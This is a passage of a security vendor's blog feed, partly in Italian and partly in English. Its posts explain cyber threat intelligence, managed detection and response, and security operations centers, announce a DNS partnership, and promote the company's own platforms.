&lt;p&gt;Include la &lt;strong&gt;raccolta, l’elaborazione e l’analisi dei dati di sicurezza informatica multi-sorgente&lt;/strong&gt;, utilizzando algoritmi analitici avanzati ed esfiltrazioni di informazioni, al fine di rilevare il maggior numero di possibili tipologie di attacco attraverso la comprensione degli obiettivi e metodi messi in atto dai criminali informatici.&lt;/p&gt;
&lt;p&gt;Raccogliendo e analizzando grandi quantità di dati sulle minacce e le tendenze della sicurezza informatica, la Cyber Threat intelligence permette ai team di sicurezza IT di:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Rafforzare la postura di sicurezza aziendale&lt;/strong&gt; tramite la comprensione dell’avversario;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Anticipare in modo proattivo gli attaccanti&lt;/strong&gt;;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.certego.net/services/rapid-incident-response/&quot;&gt;&lt;strong&gt;Rispondere più velocemente&lt;/strong&gt;&lt;/a&gt; in caso di incidente;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Prendere decisioni strategiche per il futuro e investire il budget con saggezza&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h1&gt;&lt;strong&gt;2. Quali sono i vantaggi della Cyber Threat Intelligence?&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;La Cyber Threat Intelligence migliora la capacità dell’azienda di ridurre i rischi informatici, attraverso l’analisi dettagliate delle possibili minacce e dei feedback di intelligence su tutte soluzioni che proteggono la superficie di attacco.&lt;/p&gt;
&lt;p&gt;Per poter potenziare efficacemente le strategie di sicurezza informatica di un&apos;organizzazione, una &lt;a href=&quot;https://www.certego.net/platform/threat-intelligence-modules/&quot;&gt;piattaforma avanzata di Threat Intelligence&lt;/a&gt; deve comprendere le seguenti funzionalità:&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;&lt;em&gt;Correlazione dei dati multi-sorgente&lt;/em&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Diversi punti di vista producono dati e approfondimenti diversi. Una piattaforma di intelligence sulle minacce deve essere in grado di &lt;strong&gt;aggregare sia fonti di dati interne che esterne&lt;/strong&gt;, per fornire all’organizzazione una visibilità più completa delle minacce che probabilmente dovrà affrontare.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;&lt;em&gt;Analisi approfondita dei dati&lt;/em&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;L’enorme mole di dati raccolti da una piattaforma d’intelligence potrebbe facilmente sopraffare il team di sicurezza di un&apos;organizzazione. Per questo una piattaforma avanzata di Cyber Threat Intelligence deve essere in grado di eseguire &lt;strong&gt;analisi automatizzate&lt;/strong&gt;, valutazioni e definizione delle priorità per garantire che gli analisti vedano prima &lt;strong&gt;i dati più importanti&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;&lt;em&gt;Condivisione automatizzata dei dati&lt;/em&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Disporre di dati di intelligence sulle minacce su un unico sistema centralizzato e fare esclusivamente affidamento sugli analisti per distribuirli manualmente sulle soluzioni difensive aziendali ne limita l&apos;efficacia.&lt;/p&gt;
&lt;p&gt;Una piattaforma di intelligence deve prevedere la possibilità di &lt;strong&gt;diffondere automaticamente le informazioni sulle soluzioni di sicurezza dell’organizzazione&lt;/strong&gt; per velocizzare le attività di aggiornamento delle difese.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;&lt;em&gt;Aggiornamenti in tempo reale&lt;/em&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Molte campagne di attacco durano poche ore o minuti. L&apos;intelligence sulle minacce che si aggiorna quotidianamente è molto limitata ed è necessario disporre di una piattaforma in grado di fornire informazioni basate sull’&lt;strong&gt;analisi dei dati in tempo reale&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;&lt;em&gt;Informazioni proattive&lt;/em&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Sapere che esiste una particolare minaccia non equivale a sapere come arginarla. La Cyber Threat Intelligence deve poter fornire &lt;strong&gt;consigli pratici e approfondimenti&lt;/strong&gt; su come l’azienda può proteggersi dalle minacce rilevate.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;3. Threat Intelligence Lifecycle: dal dato grezzo ai processi decisionali&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;L&apos;intelligence sulle minacce è una sfida; le minacce sono in continua evoluzione e richiedono alle aziende di adattarsi rapidamente e intraprendere azioni decisive.&lt;/p&gt;
&lt;p&gt;Il ciclo di vita dell&apos;intelligence è il processo che permette di &lt;strong&gt;trasformare i dati grezzi in intelligenza finita per il processo decisionale&lt;/strong&gt;, fornendo un framework che consentire ai team di sicurezza di ottimizzare le proprie risorse e rispondere efficacemente alle minacce più moderne. Ha l’obiettivo di migliorare l&apos;efficienza e la funzionalità della piattaforma di intelligence e si compone di sei passaggi che danno luogo a un ciclo di feedback per incoraggiare il miglioramento continuo delle attività di intelligence:&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;&lt;em&gt;Requirements&lt;/em&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;È la fase di sviluppo della roadmap, in cui vengono concordati insieme al cliente &lt;strong&gt;gli obiettivi, la metodologia e il programma di investigazione&lt;/strong&gt;, basati sulle specifiche esigenze aziendali.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;&lt;em&gt;Collection&lt;/em&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Definiti gli obiettivi e i requisiti dell’attività, si passa alla fase di raccolta delle informazioni.&lt;/p&gt;
&lt;p&gt;A seconda degli obiettivi, il team di Threat Intelligence si concentrerà nella ricerca di potenziali vettori di minacce, vulnerabilità esistenti e informazioni pubbliche disponibili che gli attaccanti potrebbero utilizzare per ottenere l&apos;accesso non autorizzato ai sistemi.&lt;/p&gt;
&lt;p&gt;In questa fase si ricorre anche all’uso delle &lt;strong&gt;Honeypot&lt;/strong&gt;, trappole per i criminali che hanno l’obiettivo di &lt;strong&gt;ingannare l’avversario affinché colpisca il perimetro dell’organizzazione in un punto prestabilito per farlo uscire allo scoperto&lt;/strong&gt;, studiarne le tecniche e tenerlo distante dal vero obiettivo che si intende proteggere.&lt;/p&gt;
&lt;p&gt;I luoghi in cui cercare le informazioni di intelligence includono anche i registri di eventi di rete e accesso a risorse quali blog, forum e community presenti nel &lt;strong&gt;dark web&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;&lt;em&gt;Processing&lt;/em&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In seguito alla raccolta, i dati grezzi e le informazioni esfiltrate vengono elaborate. Oltre alla valutazione dei dati per rilevanza e affidabilità, il più delle volte questa fase comporta attività quali la traduzione di informazioni da fonti esterne.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;&lt;em&gt;Analysis&lt;/em&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Ora che i dati sono stati processati, inizia la fase di analisi approfondita per trovare le risposte alle domande poste nella fase dei Requiremets. Durante la fase di analisi, il team di Threat Intelligence lavora anche per decifrare il set di dati in elementi di azione e raccomandazioni preziose per il cliente.&lt;/p&gt;
&lt;p&gt;Fondamentali per la fase di analisi sono le &lt;strong&gt;Malware Sandbox&lt;/strong&gt;, ovvero i &lt;strong&gt;sistemi di scansione dei file sospetti che permettono di farli “esplodere” in ambienti controllati al fine di studiarli e analizzarli&lt;/strong&gt;. Le Sandbox registrano ogni operazione avvenuta dal file avviato e ne tracciano il comportamento per comprendere la metodologia impiegata dagli attaccanti.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;&lt;em&gt;Dissemination&lt;/em&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Il team di intelligence traduce la propria analisi in un formato da presentare ai diversi referenti aziendali coinvolti. In questa fase, le informazioni che vengono presentate sono già utilizzabili da parte dell’azienda per prendere decisioni strategiche.&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;&lt;em&gt;Feedback&lt;/em&gt;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Ricevere i feedback sui report di Threat Intelligence è fondamentale per migliorare l’intero processo di intelligence. A volte gli obiettivi, così come gli asset aziendali cambiano; di conseguenza sarà necessario &lt;strong&gt;adattare le strategie di intelligence alle nuove esigenze e aggiungere nuove metriche da analizzare&lt;/strong&gt;.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;4. La tua azienda ha bisogno della Cyber Threat Intelligence?&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Nell’attuale paradigma della sicurezza informatica, la Cyber Threat Intelligence rappresenta una risorsa fondamentale per le aziende di ogni settore e dimensione.&lt;/p&gt;
&lt;p&gt;Le &lt;strong&gt;PMI&lt;/strong&gt; possono trarre vantaggio dai dati di intelligence per raggiungere un livello di protezione molto più avanzato. Per le &lt;strong&gt;aziende più grandi&lt;/strong&gt;, che hanno già al loro interno un team di sicurezza, i dati di intelligence rappresentano un vantaggio tangibile per &lt;strong&gt;ridurre i costi&lt;/strong&gt; attraverso l’ottimizzazione dei processi di cybersecurity e &lt;strong&gt;rendere gli analisti più preparati ed efficaci&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;La Threat Intelligence offre vantaggi unici a ogni membro dei team di sicurezza:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Analista IT&lt;/strong&gt;, migliora le proprie capacità di prevenzione e rilevamento e rafforza le difese;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;SOC&lt;/strong&gt;, ottimizza le proprie attività, attribuendo la priorità agli incidenti in base al rischio d’impatto per l’organizzazione;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Incident Responder&lt;/strong&gt;, accelera le indagini e l’assegnazione delle priorità agli incidenti;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Board aziendale&lt;/strong&gt;, ha una visione più approfondita dei i rischi che l’organizzazione deve affrontare ed è in grado di prendere decisioni più mirate sugli investimenti e le strategie da introdurre.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Certego Cyber Threat Intelligence&lt;/h3&gt;
&lt;p&gt;&lt;a href=&quot;https://www.certego.net/services/cyber-threat-intelligence/&quot;&gt;&lt;strong&gt;Quokka&lt;/strong&gt;&lt;/a&gt; è la piattaforma di Threat Intelligence di Certego per la raccolta, classificazione, analisi e condivisione delle informazioni sulle minacce e tattiche evolute.&lt;/p&gt;
&lt;p&gt;Quokka è il cuore delle attività di Threat Intelligence di Certego:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Riceve input e richieste di analisi (IP, Domini, File, ecc.) da honeypot, sensori e utenti&lt;/strong&gt;;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Elabora e correla i risultati per produrre una risposta&lt;/strong&gt; che può essere facilmente utilizzata in più contesti: avvisi automatici, analisi manuale, arricchimento dei dati, ecc.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I dati vengono continuamente aggiornati dal team di ricerca e automaticamente diffusi sulla piattaforma di &lt;a href=&quot;https://www.certego.net/services/managed-detection-and-response/&quot;&gt;&lt;strong&gt;Managed Detection and Response&lt;/strong&gt;&lt;/a&gt; proprietaria &lt;a href=&quot;https://www.certego.net/platform/security-operations-platform/&quot;&gt;&lt;strong&gt;Certego PanOptikon®&lt;/strong&gt;&lt;/a&gt; , per adattare in tempo reale i sistemi di sicurezza dei nostri clienti ed identificare le minacce più innovative.&lt;/p&gt;
&lt;p&gt;I servizi di Cyber Threat Intelligence di Certego aiutano inoltre le aziende a prendere decisioni più rapide, migliorare l’impatto degli investimenti e la distribuzione delle risorse aziendali per le attività di cybersecurity.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.certego.net/services/cyber-threat-intelligence/&quot;&gt;Per saperne di più consulta l’area del nostro sito dedicata alla Cyber Threat Intelligence.&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Certego è il primo Threat Intelligence Provider Partner italiano di dns0]]></title><description><![CDATA[Il primo servizio DNS interamente europeo, gratuito e conforme al GDPR, finanziato dall'uniopne europea per proteggere i cittadini e le organizzazioni dagli attacchi di phishing e siti malevoli.]]></description><link>https://www.certego.net/blog/certego-threat-intelligence-provider-partner-dns0/</link><guid isPermaLink="false">certego-threat-intelligence-provider-partner-dns0</guid><category><![CDATA[News]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing Specialist]]></dc:creator><pubDate>Tue, 28 Mar 2023 22:00:00 GMT</pubDate><content:encoded>&lt;p&gt;Certego è la prima azienda italiana a diventare &lt;em&gt;&lt;strong&gt;Threat Intelligence Provider Partner di dns0&lt;/strong&gt;&lt;/em&gt;, il primo servizio DNS interamente europeo, gratuito e conforme al GDPR, finanziato dall’Unione Europea, per proteggere i cittadini e le organizzazioni dagli attacchi di phishing e siti malevoli.&lt;/p&gt;
&lt;p&gt;L’obiettivo è &lt;em&gt;&lt;strong&gt;condividere con dns0 alcuni dei nostri indicatori di compromissione per proteggere gli utenti dal phishing e impedire le comunicazioni con i server Command and Control utilizzati dai malware&lt;/strong&gt;&lt;/em&gt; in circolazione.&lt;/p&gt;
&lt;p&gt;Il servizio DNS0 è stato realizzato dall&apos;omonima organizzazione francese senza scopo di lucro fondata del 2022 dai co-fondatori di NextDNS, tra i resolver più apprezzati e conosciuti per il rispetto della privacy degli utenti.&lt;/p&gt;
&lt;p&gt;DNS0 utilizza innanzitutto un&apos;&lt;em&gt;&lt;strong&gt;architettura resiliente distribuita al 100% negli stati membri europei&lt;/strong&gt;&lt;/em&gt;, in decine di data center dislocati in altrettanti Paesi. In questo modo, è possibile tenere la risoluzione dei nomi a dominio sull&apos;edge ovvero quanto più vicino possibile al client fisico di ogni utente.&lt;/p&gt;
&lt;p&gt;L&apos;infrastruttura di DNS0 non è orientata solo alle prestazioni ma &lt;strong&gt;anche alla privacy&lt;/strong&gt;: supporta infatti tutti i moderni protocolli (DNS over HTTPS, DNS over TLS, DNS over QUIC, DNS over HTTP/3, DDR Encrypted Upgrade) per la risoluzione delle richieste in forma completamente crittografata.&lt;/p&gt;
&lt;p&gt;DNS-over-QUIC, in particolare, è universalmente riconosciuto come il successore di DNS-over-HTTPS: fa sì che i dati tra client e server DNS viaggino in forma crittografata massimizzando contemporaneamente le performance.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.dns0.eu/&quot;&gt;Scopri di più sul progetto sul sito di dns0&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[5 motivi per affidarsi ai servizi di MDR]]></title><description><![CDATA[Il panorama delle minacce alla sicurezza informatica è in continua evoluzione. Scopriamo insieme come aumentare i livelli di sicurezza grazie ai servizi di Managed Detection & Response (MDR)]]></description><link>https://www.certego.net/blog/5-motivi-per-affidarsi-ai-servizi-di-mdr/</link><guid isPermaLink="false">5-motivi-per-affidarsi-ai-servizi-di-mdr</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi, Product Marketing Specialist]]></dc:creator><pubDate>Wed, 22 Mar 2023 23:00:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Il panorama delle minacce alla sicurezza informatica è in continua evoluzione&lt;/strong&gt;. La crescente adozione di tecnologie come ad esempio il cloud, l&apos;intelligenza artificiale e l&apos;IoT, sebbene abilitanti al raggiungimento dei nuovi obiettivi di business, ha reso le attività di protezione della superficie di attacco sempre più complesse per i reparti IT di ogni organizzazione.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;L’approccio tradizionale alla sicurezza informatica&lt;/strong&gt;, basato principalmente su soluzioni tecnologiche come firewall, antivirus, log management e SIEM, rappresenta oggi una buona prima linea di difesa, ma &lt;strong&gt;non è più sufficiente&lt;/strong&gt; per proteggere adeguatamente un’azienda dalle minacce di ultima generazione.&lt;/p&gt;
&lt;p&gt;Oggi, un’organizzazione che vuole proteggersi efficacemente, deve includere, oltre alle tradizionali tecnologie di prevenzione, anche le attività di rilevamento, analisi e risposta agli incidenti informatici.
Sebbene molte organizzazioni siano consapevoli dell&apos;evoluzione delle esigenze di sicurezza, non dispongono delle risorse e delle competenze necessarie per gestire le complessità dei nuovi scenari di sicurezza aziendale. È qui che entrano in gioco i servizi gestiti di Detection e Response.&lt;/p&gt;
&lt;p&gt;Il termine &lt;a href=&quot;https://www.certego.net/services/managed-detection-and-response/&quot;&gt;Managed Detection &amp;#x26; Response (MDR)&lt;/a&gt; identifica i &lt;strong&gt;servizi gestiti di sicurezza informatica, forniti da esperti specializzati, 24 ore su 24, 7 giorni su 7, che combinano tecnologia e competenze umane al fine di&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Migliorare le attività di rilevamento;&lt;/li&gt;
&lt;li&gt;Velocizzare le attività di &lt;a href=&quot;https://www.certego.net/services/rapid-incident-response/&quot;&gt;Incident Response&lt;/a&gt;;&lt;/li&gt;
&lt;li&gt;Mettere in campo attività di contenimento in seguito ad un attacco;&lt;/li&gt;
&lt;li&gt;Svolgere attività di analisi per migliore la resilienza degli apparati IT.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I servizi di Managed Detection &amp;#x26; Response rappresentano la risposta alle &lt;strong&gt;sfide dei reparti IT&lt;/strong&gt; che ambiscono ad aumentare la maturità della sicurezza e ridurre i rischi informatici. Vediamole insieme:&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;1. Aumentare le difese informatiche&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;I provider di MDR sono costantemente messi alla prova da un volume e una varietà di attacchi informatici indiscutibilmente maggiore rispetto a quelli che potrebbero verificarsi in ogni singola realtà aziendale; ne consegue un livello di esperienza quasi impossibile da replicare internamente all’azienda.&lt;/p&gt;
&lt;p&gt;È molto importante considerare che chi lavora in un grande team di MDR ha la possibilità di condividere le proprie esperienze e intuizioni con i colleghi, &lt;strong&gt;accelerando ulteriormente le attività di risposta e facendo esperienza di quanto appreso per applicarlo al profilo di un’altra azienda cliente prima che la minaccia possa verificarsi&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Inoltre, gli &lt;a href=&quot;https://www.certego.net/company/security-operations-team/&quot;&gt;analisti&lt;/a&gt; che si occupano di attività di MDR hanno maggiore dimestichezza nell’utilizzo degli strumenti per la ricerca delle minacce, il che permette di rispondere in modo più rapido e puntuale al rilevamento di una minaccia.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;2. Ottimizzare i carchi di lavoro delle risorse IT interne&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Uno dei principali vantaggi dell’affidarsi ai servizi gestiti di sicurezza informatica è che permette alle risorse IT interne all’azienda di avere maggiore tempo da dedicare ai processi più strategici e di business.&lt;/p&gt;
&lt;p&gt;Oltre alla mancanza di tempo, le organizzazioni faticano a ricoprire ruoli specializzati che richiedono competenze di analisi e Incident Response.
Affidarsi ad un provider di MDR garantisce all’azienda l’&lt;strong&gt;accesso immediato a competenze di alto livello&lt;/strong&gt; in materia di sicurezza informatica, &lt;strong&gt;senza la necessità di reperire e formare risorse interne dedicate&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Affidarsi ai servizi di Managed Detection &amp;#x26; Response consente alle organizzazioni di rimanere al sicuro senza dover sforzare il proprio budget e aumentare i carichi di lavoro dei reparti IT interni.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;3. Monitorare gli asset 24 ore su 24, 7 giorni su 7&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Monitorare la sicurezza durante le ore di lavoro non è sufficiente, perché i criminali informatici non rispettano i normali orari di lavoro. La sicurezza informatica è una preoccupazione 24/7 pertanto anche l’approccio deve esserlo.&lt;/p&gt;
&lt;p&gt;Una soluzione di sicurezza 24 ore su 24, 7 giorni su 7 per il monitoraggio continuo delle minacce è essenziale al fine di &lt;strong&gt;rilevare e rispondere in maniera tempestiva agli attacchi prima che diventino un problema&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Applicando il monitoraggio continuo, il provider di MDR è in grado riconoscere rapidamente e in qualsiasi momento eventuali attività anomale e adottare misure immediate per tenere le minacce fuori da un sistema, anche nelle ore in cui il reparto IT dell’azienda non è al lavoro. Nella fase inziale di assesment con il cliente sarà infatti possibile &lt;strong&gt;concordare le procedure da mettere in pratica&lt;/strong&gt; qual ora si verifichi una minaccia al di fuori delle ore di ufficio; questo permetterà agli analisti del provider di &lt;strong&gt;applicare policy di contenimento immediate&lt;/strong&gt; e al reparto IT aziendale di fare sogni tranquilli.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;4. Potersi affidare ad un servizio su misura&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;A proposito delle policy di contenimento, i principali provider di soluzioni MDR utilizzano &lt;strong&gt;regole personalizzabili per definire le policy di sicurezza in base alle esigenze di ciascun cliente&lt;/strong&gt;. Queste regole consentono agli specialisti di MDR di applicare criteri operativi e di sicurezza esatti, aggiornarli per allinearli alle mutevoli esigenze aziendali e alle nuove minacce.&lt;/p&gt;
&lt;p&gt;Attraverso l’impostazione delle regole di sicurezza personalizzate, il team di &lt;a href=&quot;https://www.certego.net/company/security-operations-team/&quot;&gt;Detection &amp;#x26; Response&lt;/a&gt; del provider è in grado di &lt;strong&gt;filtrare in modo selettivo gli eventi rumorosi che non rappresentano un reale rischio per la sicurezza&lt;/strong&gt;. La gestione degli alert è un’attività dispendiosa, ma utilizzando tecnologie come il machine learning e l’intelligenza artificiale, le migliori soluzioni di MDR permettono di eliminare drasticamente il numero di falsi positivi, notificando al cliente solo le minacce che rappresentano una reale situazione di rischio.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;5. Threat Intelligence avanzata&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;Un’altra componente cruciale di un servizio di Managed Detection &amp;#x26; Response di primo livello è rappresentato dalla &lt;a href=&quot;https://www.certego.net/services/cyber-threat-intelligence/&quot;&gt;Threat Intelligence&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Le metodologie di attacco più avanzate sfruttano tecniche sofisticate che non consentono il rilevamento da parte di molte tecnologie di sicurezza informatica&lt;/strong&gt;. Un servizio di MDR guidato dalle attività di Threat Intelligence permette di rimediare a questo limite attraverso le attività di &lt;strong&gt;ricerca proattiva delle minacce&lt;/strong&gt;. &lt;strong&gt;Combinando le informazioni di Intelligence sulle minacce esterne con la ricerca interna e gli approfondimenti di prima mano sui dati dei clienti, le migliori soluzioni di MDR riescono a identificare in anticipo tattiche, tecniche e procedure di attacco (TTP) innovative&lt;/strong&gt;, permettendo di migliorare i processi di rilevamento, ma anche lo &lt;strong&gt;sviluppo di set di regole di correlazione e playbook di risposta agli incidenti&lt;/strong&gt;.&lt;/p&gt;
&lt;h3&gt;Certego MDR: la soluzione completa per le nuove sfide di Cybersecurity:&lt;/h3&gt;
&lt;p&gt;I servizi Certego di Managed Detection &amp;#x26; Response vengono erogati attraverso la piattaforma proprietaria di Security Orchestration, Automaton and Response (SOAR), Certego PanOptikon© che abilita le attività di monitoraggio in tempo reale, analisi e risposta degli incidenti, oltre all’interazione diretta tra il team IT del cliente e il Detection &amp;#x26; Response team di Certego.&lt;/p&gt;
&lt;p&gt;La piattaforma utilizza un approccio modulare per adattarsi all&apos;infrastruttura dell&apos;organizzazione e scalare in base alle nuove necessità.&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.certego.net/platform/security-operations-platform/&quot;&gt;Scopri di più sulla nostra piattaforma di proprietà Certego PanOptikon©&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Why you need a security operation center (SOC)]]></title><description><![CDATA[Companies have more cybersecurity options at their disposal than ever before. Find out how to increase your security posture]]></description><link>https://www.certego.net/blog/why-you-need-a-security-operation-center-soc/</link><guid isPermaLink="false">why-you-need-a-security-operation-center-soc</guid><category><![CDATA[Blog]]></category><category><![CDATA[Cybersecurity]]></category><category><![CDATA[Threat Intelligence]]></category><dc:creator><![CDATA[Pier Giorgio Bergonzi]]></dc:creator><pubDate>Wed, 04 Jan 2023 23:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;What is a Security Operation Center (SOC)?&lt;/h2&gt;
&lt;p&gt;A Security Operations Center (SOC) is a &lt;strong&gt;centralized unit that provides security oversight for the organization&lt;/strong&gt;. The SOC is responsible for continuously monitoring and improving the organization&apos;s security posture, as well as responding to threat incidents.
SOC can be an in-house team of experts or an outsourced team. Anyway, the job of the SOC is the same: it will work to respond to cybersecurity incident, increasing the company protection and provide a fast way to respond to incoming threats.
There are many benefits to working with a Security Operations Center, but the primary is that it &lt;strong&gt;puts you in touch with expertise that might otherwise be difficult or impossible to cultivate internally&lt;/strong&gt;.&lt;/p&gt;
&lt;h2&gt;How a security operations center works&lt;/h2&gt;
&lt;p&gt;A SOC uses a combination of people, processes, and technology to carry out its functions. The SOC team may be made up of security analysts, engineers, and incident response personnel.
&lt;strong&gt;The team works together to monitor the company organization&apos;s networks and systems for signs of intrusion or other suspicious activity. When an incident is detected, the SOC team will work to contain and remediate the issue.&lt;/strong&gt;
The key activities that a SOC engages in are planning and preparation, detection and response, and recovery and compliance. By Relying on a SOC the organization will be prepared for incoming threats, responding quickly, and compliant with regional regulations.&lt;/p&gt;
&lt;h2&gt;SOC Activities&lt;/h2&gt;
&lt;p&gt;There are several activities within a Security Operations Center, including managers, analysts, investigators, responders, and auditors.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Analysts and investigators are &lt;strong&gt;continuously looking for incoming threats&lt;/strong&gt;, checking interactions and incidents for malice.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Responders are the individuals that handle incoming threats once they&apos;ve been detected by the analysts and investigators. They work to &lt;strong&gt;minimize the damage of the threat and, ultimately, remove it&lt;/strong&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Auditors &lt;strong&gt;continuously look through your current practices&lt;/strong&gt;, updating outdated policies and making sure that you&apos;re following the latest recommendations in cybersecurity.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Managed Detection &amp;#x26; Response SOC&lt;/h2&gt;
&lt;p&gt;A managed detection and response (MDR) SOC &lt;strong&gt;provides security operations support as a managed service&lt;/strong&gt;. An MDR SOC is typically operated by a third-party provider and is responsible for continuously monitoring and improving the security posture of the organization&apos;s networks and systems.
Compared to a SOC within the company, a third-party SOC, based on MDR, provides additional services and functions, such as alert triage and investigation, incident reporting and escalation, remote response, and threat hunting.&lt;/p&gt;
&lt;h2&gt;Why should you work with a service provider SOC?&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Working with a third-party SOC gives you instant access to a specialist body of knowledge&lt;/strong&gt;. SOC teams have a &lt;strong&gt;deep understanding of security threats and vulnerabilities&lt;/strong&gt;. This knowledge can help organizations proactively identify and mitigate potential risks.
A SOC can also give you &lt;strong&gt;access to a wealth of knowledge and experience&lt;/strong&gt; that you may not have in-house. SOC analysts are experts in cybersecurity, and they can help you to understand the threats that you face and how to best protect yourself against them.&lt;/p&gt;
&lt;h4&gt;Raise up a new level of expertise&lt;/h4&gt;
&lt;p&gt;Working with a SOC can help you to &lt;strong&gt;raise up a new level of expertise&lt;/strong&gt; in cybersecurity, like having the opportunity to learn from the best in the business and to develop your own skills and knowledge.&lt;/p&gt;
&lt;h4&gt;24/7/365 monitoring&lt;/h4&gt;
&lt;p&gt;SOC analysts are on hand &lt;strong&gt;24/7/365&lt;/strong&gt; to monitor your systems and to respond to any threats that they identify. This can help to ensure that critical systems are always protected.
In today&apos;s world, &lt;strong&gt;24/7/365 protection is a must&lt;/strong&gt;, as you never know when or where a potential threat is going to come from. SOCs give you the confidence that no matter when a threat hits your systems, you&apos;ll be ready to respond.&lt;/p&gt;
&lt;h4&gt;Improve your cybersecurity posture&lt;/h4&gt;
&lt;p&gt;SOC teams can help organizations to improve their overall security posture. Your security posture isn&apos;t just important for responding to threats, but also in deterring them. Having a &lt;strong&gt;more robust cybersecurity presence&lt;/strong&gt; can help make you less of a target in the eyes of bad actors.&lt;/p&gt;
&lt;h4&gt;Centralized security management&lt;/h4&gt;
&lt;p&gt;Last but not the least, a third-party SOC teams can provide you with a &lt;strong&gt;centralized point of contact for all security-related issues&lt;/strong&gt;. This can help to streamline your security management and make it easier to respond to incidents.&lt;/p&gt;
&lt;h2&gt;Invest in a strong cybersecurity protection with Certego MDR&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Certego&lt;/strong&gt; Managed Detection &amp;#x26; Response services are powered by a &lt;strong&gt;proprietary Security Orchestration, Automaton and Response (SOAR) Platform&lt;/strong&gt;, named Certego PanOptikon© which enables the process of Real Time Security Monitoring and Incident Response.
The Platform uses a &lt;strong&gt;modular approach&lt;/strong&gt; so it can scale up with the organization’s infrastructure and it can be easily adapted to its actual needs. &lt;strong&gt;It enables and supports processes of data gathering, security events correlation and analysis operations, in real-time&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;Thanks to the in-depth investigations, provided as-a-service by the Certego Computer Security Incident Response Team (CSIRT) with a &lt;strong&gt;full remote coverage h24x7x365 eyes on glass&lt;/strong&gt;, both in italian and english languages, it is possible to quickly detect, investigate and &lt;strong&gt;respond to the most advanced cyber threats&lt;/strong&gt;.&lt;/p&gt;
